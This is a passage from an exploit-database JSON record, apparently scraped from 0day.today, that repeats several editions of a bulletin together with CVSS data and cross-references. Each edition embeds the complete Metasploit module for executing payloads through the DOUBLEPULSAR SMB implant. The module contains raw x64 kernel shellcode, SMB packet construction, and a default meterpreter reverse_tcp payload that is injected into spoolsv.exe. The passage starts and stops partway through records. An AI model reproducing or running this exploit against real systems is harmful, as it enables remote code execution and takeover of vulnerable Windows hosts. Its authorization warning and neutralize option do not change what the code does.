\"\\x51\\x41\\x50\\x52\\x51\\x56\\x48\\x89\\xc2\\x8b\\x42\\x3c\\x48\\x01\\xd0\\x8b\" +\r\n \"\\x80\\x88\\x00\\x00\\x00\\x48\\x01\\xd0\\x50\\x8b\\x48\\x18\\x44\\x8b\\x40\\x20\" +\r\n \"\\x49\\x01\\xd0\\x48\\xff\\xc9\\x41\\x8b\\x34\\x88\\x48\\x01\\xd6\\xe8\\x78\\xff\" +\r\n \"\\xff\\xff\\x45\\x39\\xd9\\x75\\xec\\x58\\x44\\x8b\\x40\\x24\\x49\\x01\\xd0\\x66\" +\r\n \"\\x41\\x8b\\x0c\\x48\\x44\\x8b\\x40\\x1c\\x49\\x01\\xd0\\x41\\x8b\\x04\\x88\\x48\" +\r\n \"\\x01\\xd0\\x5e\\x59\\x5a\\x41\\x58\\x41\\x59\\x41\\x5b\\x41\\x53\\xff\\xe0\\x56\" +\r\n \"\\x41\\x57\\x55\\x48\\x89\\xe5\\x48\\x83\\xec\\x20\\x41\\xbb\\xda\\x16\\xaf\\x92\" +\r\n \"\\xe8\\x4d\\xff\\xff\\xff\\x31\\xc9\\x51\\x51\\x51\\x51\\x41\\x59\\x4c\\x8d\\x05\" +\r\n \"\\x1a\\x00\\x00\\x00\\x5a\\x48\\x83\\xec\\x20\\x41\\xbb\\x46\\x45\\x1b\\x22\\xe8\" +\r\n \"\\x68\\xff\\xff\\xff\\x48\\x89\\xec\\x5d\\x41\\x5f\\x5e\\xc3\"\r\n end\r\n\r\n def kernel_shellcode_size\r\n make_kernel_shellcode('').length\r\n end\r\n\r\nend\n\n# 0day.today [2021-10-01] #"}, "lastseen": "2021-10-01T00:17:03", "differentElements": ["sourceData"], "edition": 31}, {"bulletin": {"id": "1337DAY-ID-33313", "vendorId": null, "hash": "2f15f57c3d400210b1a7bed66090eb9b", "type": "zdt", "bulletinFamily": "exploit", "title": "DOUBLEPULSAR - Payload Execution and Neutralization Exploit", "description": "This Metasploit module executes a Metasploit payload against the Equation Group's DOUBLEPULSAR implant for SMB as popularly deployed by ETERNALBLUE. While this module primarily performs code execution against the implant, the \"Neutralize implant\" target allows you to disable the implant.", "published": "2019-10-04T00:00:00", "modified": "2019-10-04T00:00:00", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}, "cvss2": {"cvssV2": {"accessComplexity": "MEDIUM", "accessVector": "NETWORK", "authentication": "NONE", "availabilityImpact": "COMPLETE", "baseScore": 9.3, "confidentialityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "vectorString": "AV:N/AC:M/Au:N/C:C/I:C/A:C", "version": "2.0"}, "exploitabilityScore": 8.6, "impactScore": 10.0, "obtainAllPrivilege": false, "obtainOtherPrivilege": false, "obtainUserPrivilege": false, "severity": "HIGH", "userInteractionRequired": false}, "cvss3": {"cvssV3": {"attackComplexity": "HIGH", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "baseScore": 8.1, "baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "scope": "UNCHANGED", "userInteraction": "NONE", "vectorString": "CVSS:3.0/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.0"}, "exploitabilityScore": 2.2, "impactScore": 5.9}, "href": "https://0day.today/exploit/description/33313", "reporter": "zdt", "references": [], "cvelist": ["CVE-2017-0146", "CVE-2017-0144", "CVE-2017-0147", "CVE-2017-0143", "CVE-2017-0145", "CVE-2017-0148"], "immutableFields": [], "lastseen": "2021-10-01T22:17:13", "history": [], "viewCount": 93, "enchantments": {"dependencies": {"references": [{"type": "attackerkb", "idList": ["AKB:B43D414F-6140-4931-BED8-4AE15FFDFAE1", "AKB:400EDB06-73BF-4A6D-A113-643077965C7B", "AKB:D476227F-C4B1-49E3-9947-897077E5150D"]}, {"type": "exploitdb", "idList": ["EDB-ID:47456", "EDB-ID:41987", "EDB-ID:41891", "EDB-ID:43970", "EDB-ID:42030"]}, {"type": "zdt", "idList": ["1337DAY-ID-27752", "1337DAY-ID-33895", "1337DAY-ID-27802", "1337DAY-ID-29702", "1337DAY-ID-27803", "1337DAY-ID-27613", "1337DAY-ID-27786"]}, {"type": "rapid7community", "idList": ["RAPID7COMMUNITY:8B3AE9E0999C9317B6911ECE10B8A820", "RAPID7COMMUNITY:3EEFED2F93F50D3C56A51C03A7A3513D", "RAPID7COMMUNITY:4570AAF658D82BF591A6D6AB473704B6", "RAPID7COMMUNITY:958C8DA808BCCA56E72237E0015ED607", "RAPID7COMMUNITY:9E4E3C72C90426CECD1801D8F0006388", "RAPID7COMMUNITY:D6095B3BBE1704D4062E19C249D178EC", "RAPID7COMMUNITY:761964EB7C8E68AD2D9E6DC0095DF4C0", "RAPID7COMMUNITY:B91CF4077282454499672A7AD6FBE744"]}, {"type": "packetstorm", "idList": ["PACKETSTORM:154690", "PACKETSTORM:142181", "PACKETSTORM:146236", "PACKETSTORM:142548", "PACKETSTORM:156196"]}, {"type": "nessus", "idList": ["700059.PRM", "700099.PRM", "SMB_NT_MS17-010.NASL", "MS17-010.NASL"]}, {"type": "openvas", "idList": ["OPENVAS:1361412562310810698", "OPENVAS:1361412562310810676", "OPENVAS:1361412562310810810"]}, {"type": "f5", "idList": ["F5:K57181937"]}, {"type": "mskb", "idList": ["KB4013389", "KB4012598"]}, {"type": "kaspersky", "idList": ["KLA10977"]}, {"type": "metasploit", "idList": ["MSF:EXPLOIT/WINDOWS/SMB/DOUBLEPULSAR_RCE", "MSF:EXPLOIT/WINDOWS/SMB/MS17_010_PSEXEC", "MSF:EXPLOIT/WINDOWS/SMB/MS17_010_ETERNALBLUE_WIN8", "MSF:ILITIES/MSFT-CVE-2017-0146/", "MSF:EXPLOIT/WINDOWS/SMB/MS17_010_ETERNALBLUE", "MSF:AUXILIARY/SCANNER/SMB/SMB_MS17_010", "MSF:ILITIES/MSFT-CVE-2017-0145/", "MSF:AUXILIARY/ADMIN/SMB/MS17_010_COMMAND", "MSF:EXPLOIT/WINDOWS/SMB/SMB_DOUBLEPULSAR_RCE"]}, {"type": "seebug", "idList": ["SSV:92952", "SSV:92964"]}, {"type": "huawei", "idList": ["HUAWEI-SA-20170513-01-WINDOWS"]}, {"type": "cve", "idList": ["CVE-2017-0144", "CVE-2017-0147", "CVE-2017-0148", "CVE-2017-0145", "CVE-2017-0146", "CVE-2017-0143"]}, {"type": "symantec", "idList": ["SMNTC-96703", "SMNTC-96704", "SMNTC-96707", "SMNTC-96706", "SMNTC-96705", "SMNTC-96709"]}, {"type": "kitploit", "idList": ["KITPLOIT:9146046356497464176"]}, {"type": "trendmicroblog", "idList": ["TRENDMICROBLOG:90481B7D0C6FD15C950712E718E29E3A", "TRENDMICROBLOG:657A275464AD59827A9E6C1CD1726546", "TRENDMICROBLOG:F01C658432B4BB0C2F28F1E5CE666104", "TRENDMICROBLOG:4A07139FC4D015AFBEA9BD27C01BBA37"]}, {"type": "threatpost", "idList": ["THREATPOST:C95C260596C8EA3C1F60B8BCC0360A41", "THREATPOST:D6175B132FE6B7820E744D2387FE7D5D", "THREATPOST:F569DB7301109F1CDBCA30319EA8E2E7", "THREATPOST:6520102503D39BD2183F4ECDEFA9D591", "THREATPOST:046D40D1A5114EC07BBA6DB3AE27AA61", "THREATPOST:758CC5987A361EA1BB8BBFFC425334D5"]}, {"type": "mmpc", "idList": ["MMPC:F4F919BF0CF7F97FD15CFA500398C7D9", "MMPC:FECB9309EE6D84976C56C12C05F1CD02", "MMPC:C211C70545FBDF88C2F99362DC4608A8", "MMPC:F3E0CD42C341A30C758CB85AD9F6D052", "MMPC:89789F73D15A0B331512F90F7E692851"]}, {"type": "canvas", "idList": ["ETERNALBLUE", "MS17_010"]}, {"type": "thn", "idList": ["THN:F12E2167FDA829ED32C7A16A83B048BF", "THN:2E043D9BAC04DEE81005124DD54A31E2", "THN:18A54BDD63D7DC2B3284D326E6510150", "THN:C50AC2400E56ED88DBA7FC6DAC8360A8", "THN:FF56343C15BACA1C1CE83A105EFD7F77"]}, {"type": "qualysblog", "idList": ["QUALYSBLOG:B891CB6093D217510DB7327088AE7FB2"]}, {"type": "mscve", "idList": ["MS:CVE-2017-0145", "MS:CVE-2017-0148", "MS:CVE-2017-0143"]}, {"type": "talosblog", "idList": ["TALOSBLOG:E2BCC6AEFE1A7A25F49757116346A7A6"]}, {"type": "myhack58", "idList": ["MYHACK58:62201786371"]}, {"type": "saint", "idList": ["SAINT:9EF85E0CE1D118D27911357B1C516074", "SAINT:DAEC4BA69103823E03C8F3C832C5B41D", "SAINT:BD676E3751A4D110EAA275BF92CA7E46", "SAINT:64F70C2A6C3961CA44A77286E5B810CD"]}, {"type": "carbonblack", "idList": ["CARBONBLACK:6730D6EB8DF875C002A93DBC78C80B9D"]}, {"type": "nmap", "idList": ["NMAP:SMB-VULN-MS17-010.NSE"]}, {"type": "malwarebytes", "idList": ["MALWAREBYTES:2AA5391DE4E1CAB582414AAD58B623CC"]}], "modified": "2021-09-29T22:25:08", "rev": 2}, "score": {"value": 7.7, "vector": "NONE", "modified": "2021-09-29T22:25:08", "rev": 2}}, "objectVersion": "1.6", "sourceHref": "https://0day.today/exploit/33313", "sourceData": "##\r\n# This module requires Metasploit: https://metasploit.com/download\r\n# Current source: https://github.com/rapid7/metasploit-framework\r\n##\r\n\r\nclass MetasploitModule < Msf::Exploit::Remote\r\n\r\n Rank = GreatRanking\r\n\r\n include Msf::Exploit::Remote::SMB::Client\r\n\r\n MAX_SHELLCODE_SIZE = 4096\r\n\r\n def initialize(info = {})\r\n super(update_info(info,\r\n 'Name' => 'DOUBLEPULSAR Payload Execution and Neutralization',\r\n 'Description' => %q{\r\n This module executes a Metasploit payload against the Equation Group's\r\n DOUBLEPULSAR implant for SMB as popularly deployed by ETERNALBLUE.\r\n\r\n While this module primarily performs code execution against the implant,\r\n the \"Neutralize implant\" target allows you to disable the implant.\r\n },\r\n 'Author' => [\r\n 'Equation Group', # DOUBLEPULSAR implant\r\n 'Shadow Brokers', # Equation Group dump\r\n 'zerosum0x0', # DOPU analysis and detection\r\n 'Luke Jennings', # DOPU analysis and detection\r\n 'wvu', # Metasploit module and arch detection\r\n 'Jacob Robles' # Metasploit module and RCE help\r\n ],\r\n 'References' => [\r\n ['MSB', 'MS17-010'],\r\n ['CVE', '2017-0143'],\r\n ['CVE', '2017-0144'],\r\n ['CVE', '2017-0145'],\r\n ['CVE', '2017-0146'],\r\n ['CVE', '2017-0147'],\r\n ['CVE', '2017-0148'],\r\n ['URL', 'https://zerosum0x0.blogspot.com/2017/04/doublepulsar-initial-smb-backdoor-ring.html'],\r\n ['URL', 'https://countercept.com/blog/analyzing-the-doublepulsar-kernel-dll-injection-technique/'],\r\n ['URL', 'https://www.countercept.com/blog/doublepulsar-usermode-analysis-generic-reflective-dll-loader/'],\r\n ['URL', 'https://github.com/countercept/doublepulsar-detection-script'],\r\n ['URL', 'https://github.com/countercept/doublepulsar-c2-traffic-decryptor'],\r\n ['URL', 'https://gist.github.com/msuiche/50a36710ee59709d8c76fa50fc987be1']\r\n ],\r\n 'DisclosureDate' => '2017-04-14',\r\n 'License' => MSF_LICENSE,\r\n 'Platform' => 'win',\r\n 'Arch' => ARCH_X64,\r\n 'Privileged' => true,\r\n 'Payload' => {\r\n 'Space' => MAX_SHELLCODE_SIZE - kernel_shellcode_size,\r\n 'DisableNops' => true\r\n },\r\n 'Targets' => [\r\n ['Execute payload', {}],\r\n ['Neutralize implant', {}]\r\n ],\r\n 'DefaultTarget' => 0,\r\n 'DefaultOptions' => {\r\n 'EXITFUNC' => 'thread',\r\n 'PAYLOAD' => 'windows/x64/meterpreter/reverse_tcp'\r\n },\r\n 'Notes' => {\r\n 'AKA' => ['DOUBLEPULSAR'],\r\n 'RelatedModules' => [\r\n 'auxiliary/scanner/smb/smb_ms17_010',\r\n 'exploit/windows/smb/ms17_010_eternalblue'\r\n ],\r\n 'Stability' => [CRASH_SAFE],\r\n 'Reliability' => [REPEATABLE_SESSION]\r\n }\r\n ))\r\n\r\n register_advanced_options([\r\n OptBool.new('DefangedMode', [true, 'Run in defanged mode', true]),\r\n OptString.new('ProcessName', [true, 'Process to inject payload into', 'spoolsv.exe'])\r\n ])\r\n end\r\n\r\n OPCODES = {\r\n ping: 0x23,\r\n exec: 0xc8,\r\n kill: 0x77\r\n }\r\n\r\n STATUS_CODES = {\r\n not_detected: 0x00,\r\n success: 0x10,\r\n invalid_params: 0x20,\r\n alloc_failure: 0x30\r\n }\r\n\r\n def calculate_doublepulsar_status(m1, m2)\r\n STATUS_CODES.key(m2.to_i - m1.to_i)\r\n end\r\n\r\n # algorithm to calculate the XOR Key for DoublePulsar knocks\r\n def calculate_doublepulsar_xor_key(s)\r\n x = (2 * s ^ (((s & 0xff00 | (s << 16)) << 8) | (((s >> 16) | s & 0xff0000) >> 8)))\r\n x & 0xffffffff # this line was added just to truncate to 32 bits\r\n end\r\n\r\n # The arch is adjacent to the XOR key in the SMB signature\r\n def calculate_doublepulsar_arch(s)\r\n s == 0 ? ARCH_X86 : ARCH_X64\r\n end\r\n\r\n def generate_doublepulsar_timeout(op)\r\n k = SecureRandom.random_bytes(4).unpack('V').first\r\n 0xff & (op - ((k & 0xffff00) >> 16) - (0xffff & (k & 0xff00) >> 8)) | k & 0xffff00\r\n end\r\n\r\n def generate_doublepulsar_param(op, body)\r\n case OPCODES.key(op)\r\n when :ping, :kill\r\n \"\\x00\" * 12\r\n when :exec\r\n Rex::Text.xor([@xor_key].pack('V'), [body.length, body.length, 0].pack('V*'))\r\n end\r\n end\r\n\r\n def check\r\n ipc_share = \"\\\\\\\\#{rhost}\\\\IPC$\"\r\n\r\n @tree_id = do_smb_setup_tree(ipc_share)\r\n vprint_good(\"Connected to #{ipc_share} with TID = #{@tree_id}\")\r\n vprint_status(\"Target OS is #{smb_peer_os}\")\r\n\r\n vprint_status('Sending ping to DOUBLEPULSAR')\r\n code, signature1, signature2 = do_smb_doublepulsar_pkt\r\n msg = 'Host is likely INFECTED with DoublePulsar!'\r\n\r\n case calculate_doublepulsar_status(@multiplex_id, code)\r\n when :success\r\n @xor_key = calculate_doublepulsar_xor_key(signature1)\r\n @arch = calculate_doublepulsar_arch(signature2)\r\n\r\n arch_str =\r\n case @arch\r\n when ARCH_X86\r\n 'x86 (32-bit)'\r\n when ARCH_X64\r\n 'x64 (64-bit)'\r\n end\r\n\r\n vprint_good(\"#{msg} - Arch: #{arch_str}, XOR Key: 0x#{@xor_key.to_s(16).upcase}\")\r\n CheckCode::Vulnerable\r\n when :not_detected\r\n vprint_error('DOUBLEPULSAR not detected or disabled')\r\n CheckCode::Safe\r\n else\r\n vprint_error('An unknown error occurred')\r\n CheckCode::Unknown\r\n end\r\n end\r\n\r\n def exploit\r\n if datastore['DefangedMode']\r\n warning = <<~EOF\r\n\r\n\r\n Are you SURE you want to execute code against a nation-state implant?\r\n You MAY contaminate forensic evidence if there is an investigation.\r\n\r\n Disable the DefangedMode option if you have authorization to proceed.\r\n EOF\r\n\r\n fail_with(Failure::BadConfig, warning)\r\n end\r\n\r\n # No ForceExploit because @tree_id and @xor_key are required\r\n unless check == CheckCode::Vulnerable\r\n fail_with(Failure::NotVulnerable, 'Unable to proceed without DOUBLEPULSAR')\r\n end\r\n\r\n case target.name\r\n when 'Execute payload'\r\n unless @xor_key\r\n fail_with(Failure::NotFound, 'XOR key not found')\r\n end\r\n\r\n if @arch == ARCH_X86\r\n fail_with(Failure::NoTarget, 'x86 is not a supported target')\r\n end\r\n\r\n print_status(\"Generating kernel shellcode with #{datastore['PAYLOAD']}\")\r\n shellcode = make_kernel_user_payload(payload.encoded, datastore['ProcessName'])\r\n shellcode << Rex::Text.rand_text(MAX_SHELLCODE_SIZE - shellcode.length)\r\n vprint_status(\"Total shellcode length: #{shellcode.length} bytes\")\r\n\r\n print_status(\"Encrypting shellcode with XOR key 0x#{@xor_key.to_s(16).upcase}\")\r\n xor_shellcode = Rex::Text.xor([@xor_key].pack('V'), shellcode)\r\n\r\n print_status('Sending shellcode to DOUBLEPULSAR')\r\n code, _signature1, _signature2 = do_smb_doublepulsar_pkt(OPCODES[:exec], xor_shellcode)\r\n when 'Neutralize implant'\r\n return neutralize_implant\r\n end\r\n\r\n case calculate_doublepulsar_status(@multiplex_id, code)\r\n when :success\r\n print_good('Payload execution successful')\r\n when :invalid_params\r\n fail_with(Failure::BadConfig, 'Invalid parameters were specified')\r\n when :alloc_failure\r\n fail_with(Failure::PayloadFailed, 'An allocation failure occurred')\r\n else\r\n fail_with(Failure::Unknown, 'An unknown error occurred')\r\n end\r\n ensure\r\n disconnect\r\n end\r\n\r\n def neutralize_implant\r\n print_status('Neutralizing DOUBLEPULSAR')\r\n code, _signature1, _signature2 = do_smb_doublepulsar_pkt(OPCODES[:kill])\r\n\r\n case calculate_doublepulsar_status(@multiplex_id, code)\r\n when :success\r\n print_good('Implant neutralization successful')\r\n else\r\n fail_with(Failure::Unknown, 'An unknown error occurred')\r\n end\r\n end\r\n\r\n def do_smb_setup_tree(ipc_share)\r\n connect\r\n\r\n # logon as user \\\r\n simple.login(datastore['SMBName'], datastore['SMBUser'], datastore['SMBPass'], datastore['SMBDomain'])\r\n\r\n # connect to IPC$\r\n simple.connect(ipc_share)\r\n\r\n # return tree\r\n simple.shares[ipc_share]\r\n end\r\n\r\n def do_smb_doublepulsar_pkt(opcode = OPCODES[:ping], body = nil)\r\n # make doublepulsar knock\r\n pkt = make_smb_trans2_doublepulsar(opcode, body)\r\n\r\n sock.put(pkt)\r\n bytes = sock.get_once\r\n\r\n return unless bytes\r\n\r\n # convert packet to response struct\r\n pkt = Rex::Proto::SMB::Constants::SMB_TRANS_RES_HDR_PKT.make_struct\r\n pkt.from_s(bytes[4..-1])\r\n\r\n return pkt['SMB'].v['MultiplexID'], pkt['SMB'].v['Signature1'], pkt['SMB'].v['Signature2']\r\n end\r\n\r\n def make_smb_trans2_doublepulsar(opcode, body)\r\n setup_count = 1\r\n setup_data = [0x000e].pack('v')\r\n\r\n param = generate_doublepulsar_param(opcode, body)\r\n data = param + body.to_s\r\n\r\n pkt = Rex::Proto::SMB::Constants::SMB_TRANS2_PKT.make_struct\r\n simple.client.smb_defaults(pkt['Payload']['SMB'])\r\n\r\n base_offset = pkt.to_s.length + (setup_count * 2) - 4\r\n param_offset = base_offset\r\n data_offset = param_offset + param.length\r\n\r\n pkt['Payload']['SMB'].v['Command'] = CONST::SMB_COM_TRANSACTION2\r\n pkt['Payload']['SMB'].v['Flags1'] = 0x18\r\n pkt['Payload']['SMB'].v['Flags2'] = 0xc007\r\n\r\n @multiplex_id = rand(0xffff)\r\n\r\n pkt['Payload']['SMB'].v['WordCount'] = 14 + setup_count\r\n pkt['Payload']['SMB'].v['TreeID'] = @tree_id\r\n pkt['Payload']['SMB'].v['MultiplexID'] = @multiplex_id\r\n\r\n pkt['Payload'].v['ParamCountTotal'] = param.length\r\n pkt['Payload'].v['DataCountTotal'] = body.to_s.length\r\n pkt['Payload'].v['ParamCountMax'] = 1\r\n pkt['Payload'].v['DataCountMax'] = 0\r\n pkt['Payload'].v['ParamCount'] = param.length\r\n pkt['Payload'].v['ParamOffset'] = param_offset\r\n pkt['Payload'].v['DataCount'] = body.to_s.length\r\n pkt['Payload'].v['DataOffset'] = data_offset\r\n pkt['Payload'].v['SetupCount'] = setup_count\r\n pkt['Payload'].v['SetupData'] = setup_data\r\n pkt['Payload'].v['Timeout'] = generate_doublepulsar_timeout(opcode)\r\n pkt['Payload'].v['Payload'] = data\r\n\r\n pkt.to_s\r\n end\r\n\r\n # ring3 = user mode encoded payload\r\n # proc_name = process to inject APC into\r\n def make_kernel_user_payload(ring3, proc_name)\r\n sc = make_kernel_shellcode(proc_name)\r\n\r\n sc << [ring3.length].pack(\"S<\")\r\n sc << ring3\r\n\r\n sc\r\n end\r\n\r\n def generate_process_hash(process)\r\n # x64_calc_hash from external/source/shellcode/windows/multi_arch_kernel_queue_apc.asm\r\n proc_hash = 0\r\n process << \"\\x00\"\r\n\r\n process.each_byte do |c|\r\n proc_hash = ror(proc_hash, 13)\r\n proc_hash += c\r\n end\r\n\r\n [proc_hash].pack('l<')\r\n end\r\n\r\n def ror(dword, bits)\r\n (dword >> bits | dword << (32 - bits)) & 0xFFFFFFFF\r\n end\r\n\r\n def make_kernel_shellcode(proc_name)\r\n # see: external/source/shellcode/windows/multi_arch_kernel_queue_apc.asm\r\n # Length: 780 bytes\r\n \"\\x31\\xc9\\x41\\xe2\\x01\\xc3\\x56\\x41\\x57\\x41\\x56\\x41\\x55\\x41\\x54\\x53\" +\r\n \"\\x55\\x48\\x89\\xe5\\x66\\x83\\xe4\\xf0\\x48\\x83\\xec\\x20\\x4c\\x8d\\x35\\xe3\" +\r\n \"\\xff\\xff\\xff\\x65\\x4c\\x8b\\x3c\\x25\\x38\\x00\\x00\\x00\\x4d\\x8b\\x7f\\x04\" +\r\n \"\\x49\\xc1\\xef\\x0c\\x49\\xc1\\xe7\\x0c\\x49\\x81\\xef\\x00\\x10\\x00\\x00\\x49\" +\r\n \"\\x8b\\x37\\x66\\x81\\xfe\\x4d\\x5a\\x75\\xef\\x41\\xbb\\x5c\\x72\\x11\\x62\\xe8\" +\r\n \"\\x18\\x02\\x00\\x00\\x48\\x89\\xc6\\x48\\x81\\xc6\\x08\\x03\\x00\\x00\\x41\\xbb\" +\r\n \"\\x7a\\xba\\xa3\\x30\\xe8\\x03\\x02\\x00\\x00\\x48\\x89\\xf1\\x48\\x39\\xf0\\x77\" +\r\n \"\\x11\\x48\\x8d\\x90\\x00\\x05\\x00\\x00\\x48\\x39\\xf2\\x72\\x05\\x48\\x29\\xc6\" +\r\n \"\\xeb\\x08\\x48\\x8b\\x36\\x48\\x39\\xce\\x75\\xe2\\x49\\x89\\xf4\\x31\\xdb\\x89\" +\r\n \"\\xd9\\x83\\xc1\\x04\\x81\\xf9\\x00\\x00\\x01\\x00\\x0f\\x8d\\x66\\x01\\x00\\x00\" +\r\n \"\\x4c\\x89\\xf2\\x89\\xcb\\x41\\xbb\\x66\\x55\\xa2\\x4b\\xe8\\xbc\\x01\\x00\\x00\" +\r\n \"\\x85\\xc0\\x75\\xdb\\x49\\x8b\\x0e\\x41\\xbb\\xa3\\x6f\\x72\\x2d\\xe8\\xaa\\x01\" +\r\n \"\\x00\\x00\\x48\\x89\\xc6\\xe8\\x50\\x01\\x00\\x00\\x41\\x81\\xf9\" +\r\n generate_process_hash(proc_name.upcase) +\r\n \"\\x75\\xbc\\x49\\x8b\\x1e\\x4d\\x8d\\x6e\\x10\\x4c\\x89\\xea\\x48\\x89\\xd9\" +\r\n \"\\x41\\xbb\\xe5\\x24\\x11\\xdc\\xe8\\x81\\x01\\x00\\x00\\x6a\\x40\\x68\\x00\\x10\" +\r\n \"\\x00\\x00\\x4d\\x8d\\x4e\\x08\\x49\\xc7\\x01\\x00\\x10\\x00\\x00\\x4d\\x31\\xc0\" +\r\n \"\\x4c\\x89\\xf2\\x31\\xc9\\x48\\x89\\x0a\\x48\\xf7\\xd1\\x41\\xbb\\x4b\\xca\\x0a\" +\r\n \"\\xee\\x48\\x83\\xec\\x20\\xe8\\x52\\x01\\x00\\x00\\x85\\xc0\\x0f\\x85\\xc8\\x00\" +\r\n \"\\x00\\x00\\x49\\x8b\\x3e\\x48\\x8d\\x35\\xe9\\x00\\x00\\x00\\x31\\xc9\\x66\\x03\" +\r\n \"\\x0d\\xd7\\x01\\x00\\x00\\x66\\x81\\xc1\\xf9\\x00\\xf3\\xa4\\x48\\x89\\xde\\x48\" +\r\n \"\\x81\\xc6\\x08\\x03\\x00\\x00\\x48\\x89\\xf1\\x48\\x8b\\x11\\x4c\\x29\\xe2\\x51\" +\r\n \"\\x52\\x48\\x89\\xd1\\x48\\x83\\xec\\x20\\x41\\xbb\\x26\\x40\\x36\\x9d\\xe8\\x09\" +\r\n \"\\x01\\x00\\x00\\x48\\x83\\xc4\\x20\\x5a\\x59\\x48\\x85\\xc0\\x74\\x18\\x48\\x8b\" +\r\n \"\\x80\\xc8\\x02\\x00\\x00\\x48\\x85\\xc0\\x74\\x0c\\x48\\x83\\xc2\\x4c\\x8b\\x02\" +\r\n \"\\x0f\\xba\\xe0\\x05\\x72\\x05\\x48\\x8b\\x09\\xeb\\xbe\\x48\\x83\\xea\\x4c\\x49\" +\r\n \"\\x89\\xd4\\x31\\xd2\\x80\\xc2\\x90\\x31\\xc9\\x41\\xbb\\x26\\xac\\x50\\x91\\xe8\" +\r\n \"\\xc8\\x00\\x00\\x00\\x48\\x89\\xc1\\x4c\\x8d\\x89\\x80\\x00\\x00\\x00\\x41\\xc6\" +\r\n \"\\x01\\xc3\\x4c\\x89\\xe2\\x49\\x89\\xc4\\x4d\\x31\\xc0\\x41\\x50\\x6a\\x01\\x49\" +\r\n \"\\x8b\\x06\\x50\\x41\\x50\\x48\\x83\\xec\\x20\\x41\\xbb\\xac\\xce\\x55\\x4b\\xe8\" +\r\n \"\\x98\\x00\\x00\\x00\\x31\\xd2\\x52\\x52\\x41\\x58\\x41\\x59\\x4c\\x89\\xe1\\x41\" +\r\n \"\\xbb\\x18\\x38\\x09\\x9e\\xe8\\x82\\x00\\x00\\x00\\x4c\\x89\\xe9\\x41\\xbb\\x22\" +\r\n \"\\xb7\\xb3\\x7d\\xe8\\x74\\x00\\x00\\x00\\x48\\x89\\xd9\\x41\\xbb\\x0d\\xe2\\x4d\" +\r\n \"\\x85\\xe8\\x66\\x00\\x00\\x00\\x48\\x89\\xec\\x5d\\x5b\\x41\\x5c\\x41\\x5d\\x41\" +\r\n \"\\x5e\\x41\\x5f\\x5e\\xc3\\xe9\\xb5\\x00\\x00\\x00\\x4d\\x31\\xc9\\x31\\xc0\\xac\" +\r\n \"\\x41\\xc1\\xc9\\x0d\\x3c\\x61\\x7c\\x02\\x2c\\x20\\x41\\x01\\xc1\\x38\\xe0\\x75\" +\r\n \"\\xec\\xc3\\x31\\xd2\\x65\\x48\\x8b\\x52\\x60\\x48\\x8b\\x52\\x18\\x48\\x8b\\x52\" +\r\n \"\\x20\\x48\\x8b\\x12\\x48\\x8b\\x72\\x50\\x48\\x0f\\xb7\\x4a\\x4a\\x45\\x31\\xc9\" +\r\n \"\\x31\\xc0\\xac\\x3c\\x61\\x7c\\x02\\x2c\\x20\\x41\\xc1\\xc9\\x0d\\x41\\x01\\xc1\" +\r\n \"\\xe2\\xee\\x45\\x39\\xd9\\x75\\xda\\x4c\\x8b\\x7a\\x20\\xc3\\x4c\\x89\\xf8\\x41\" +\r\n \"\\x51\\x41\\x50\\x52\\x51\\x56\\x48\\x89\\xc2\\x8b\\x42\\x3c\\x48\\x01\\xd0\\x8b\" +\r\n \"\\x80\\x88\\x00\\x00\\x00\\x48\\x01\\xd0\\x50\\x8b\\x48\\x18\\x44\\x8b\\x40\\x20\" +\r\n \"\\x49\\x01\\xd0\\x48\\xff\\xc9\\x41\\x8b\\x34\\x88\\x48\\x01\\xd6\\xe8\\x78\\xff\" +\r\n \"\\xff\\xff\\x45\\x39\\xd9\\x75\\xec\\x58\\x44\\x8b\\x40\\x24\\x49\\x01\\xd0\\x66\" +\r\n \"\\x41\\x8b\\x0c\\x48\\x44\\x8b\\x40\\x1c\\x49\\x01\\xd0\\x41\\x8b\\x04\\x88\\x48\" +\r\n \"\\x01\\xd0\\x5e\\x59\\x5a\\x41\\x58\\x41\\x59\\x41\\x5b\\x41\\x53\\xff\\xe0\\x56\" +\r\n \"\\x41\\x57\\x55\\x48\\x89\\xe5\\x48\\x83\\xec\\x20\\x41\\xbb\\xda\\x16\\xaf\\x92\" +\r\n \"\\xe8\\x4d\\xff\\xff\\xff\\x31\\xc9\\x51\\x51\\x51\\x51\\x41\\x59\\x4c\\x8d\\x05\" +\r\n \"\\x1a\\x00\\x00\\x00\\x5a\\x48\\x83\\xec\\x20\\x41\\xbb\\x46\\x45\\x1b\\x22\\xe8\" +\r\n \"\\x68\\xff\\xff\\xff\\x48\\x89\\xec\\x5d\\x41\\x5f\\x5e\\xc3\"\r\n end\r\n\r\n def kernel_shellcode_size\r\n make_kernel_shellcode('').length\r\n end\r\n\r\nend\n\n# 0day.today [2021-10-02] #"}, "lastseen": "2021-10-01T22:17:13", "differentElements": ["sourceData"], "edition": 32}, {"bulletin": {"id": "1337DAY-ID-33313", "vendorId": null, "hash": "172ac72cb050a2c48305c9174a12ebbf", "type": "zdt", "bulletinFamily": "exploit", "title": "DOUBLEPULSAR - Payload Execution and Neutralization Exploit", "description": "This Metasploit module executes a Metasploit payload against the Equation Group's DOUBLEPULSAR implant for SMB as popularly deployed by ETERNALBLUE. While this module primarily performs code execution against the implant, the \"Neutralize implant\" target allows you to disable the implant.", "published": "2019-10-04T00:00:00", "modified": "2019-10-04T00:00:00", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}, "cvss2": {"cvssV2": {"accessComplexity": "MEDIUM", "accessVector": "NETWORK", "authentication": "NONE", "availabilityImpact": "COMPLETE", "baseScore": 9.3, "confidentialityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "vectorString": "AV:N/AC:M/Au:N/C:C/I:C/A:C", "version": "2.0"}, "exploitabilityScore": 8.6, "impactScore": 10.0, "obtainAllPrivilege": false, "obtainOtherPrivilege": false, "obtainUserPrivilege": false, "severity": "HIGH", "userInteractionRequired": false}, "cvss3": {"cvssV3": {"attackComplexity": "HIGH", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "baseScore": 8.1, "baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "scope": "UNCHANGED", "userInteraction": 